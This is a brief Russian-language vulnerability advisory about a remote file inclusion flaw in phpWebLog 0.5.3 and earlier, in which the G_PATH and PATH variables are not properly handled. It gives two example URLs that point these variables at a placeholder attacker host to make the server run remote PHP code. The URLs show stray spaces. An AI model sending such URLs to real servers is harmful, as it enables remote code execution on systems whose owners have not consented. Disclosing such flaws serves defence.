Программа: phpWebLog 0.5.3 и более ранние версии 

Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе.
Уязвимость существует в сценариях ‘include/init.inc.php’ и ‘backend/addons/links/index.php’ из-за некорректной обработки входных данных в переменных ‘G_PATH’ и ‘PATH’. Удаленный пользователь может помощью специально сформированного URL выполнить произвольный php сценарий на уязвимой системе. 

Пример:

http://[target]/[dir]/include/init.inc.php? G_PATH=http://[attacker]/ 
http://[target]/[dir]/backend/addons/links/ inde x.php?PATH=http://[attacker]/

Оставить мнение